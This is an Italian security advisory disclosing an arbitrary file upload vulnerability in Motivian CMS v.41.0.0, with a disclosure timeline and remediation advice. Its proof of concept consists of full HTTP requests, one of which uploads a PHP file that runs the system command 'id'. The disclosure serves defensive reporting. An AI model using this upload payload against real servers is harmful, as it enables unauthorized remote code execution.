
Questo repository rivela una vulnerabilità di sicurezza scoperta in Motivian Content Management System v.41.0.0
Questo repository rivela una vulnerabilità di sicurezza scoperta in Motivian Content Management System v.41.0.0.
Questa vulnerabilità è stata segnalata al venditore secondo le pratiche di divulgazione responsabile, e a MITRE, che ha assegnato un ID CVE temporaneo. I dettagli vengono resi pubblici dopo la scadenza del periodo di divulgazione di 45 giorni.
Content/Gallery/ImagesLa vulnerabilità di caricamento file in Motivian Content Management System v.41.0.0 consente a un attaccante remoto di caricare file arbitrari con estensioni create ad hoc (ad es. .php, .png, .txt) contenenti codice dannoso, tramite il componente Content/Gallery/Images.
La vulnerabilità può essere sfruttata caricando file con varie estensioni. A scopo dimostrativo, sono stati utilizzati due casi di prova: uno riguardante un file .php contenente codice dannoso, e un altro utilizzando un file .txt con la stringa di test EICAR. Entrambi i file sono stati caricati tramite il componente Content/Gallery/Images.
Di seguito è riportata la trascrizione completa delle richieste e risposte HTTP utilizzate per dimostrare il problema:
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"
-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"
M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"
304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"
77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream
<?php
echo system('id');
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729
Non consentire agli utenti di caricare file arbitrari. Implementare una rigorosa validazione dei file (tipo MIME e ispezione del contenuto), randomizzare i nomi dei file e limitare le directory di upload.
| Data | Azione |
|---|---|
| 2025-02-06 | Richiesta ID CVE (CNA: MITRE) |
| 2025-04-02 | Assegnazione ID CVE |
| 2025-04-07 | Vulnerabilità segnalate al venditore |
| 2025-05-31 | Divulgazione pubblica dopo la scadenza del periodo di divulgazione di 45 giorni (54 giorni totali) |
| 2025-06-04 | Registrazione ufficiale e inserimento nel database MITRE e nel portale NIST/NVD |
Scoperta e divulgata responsabilmente da:
Francesco Marcuccio
Consulente di CyberSecurity, Penetration Tester
Attribuzione dello scopritore MITRE elencata come:
Francesco Marcuccio
Consulente di CyberSecurity, Penetration Tester
Questo ID CVE è ufficialmente in stato PUBLISHED. Sarà aggiornato con il punteggio CVSS da NIST, dopo l'analisi.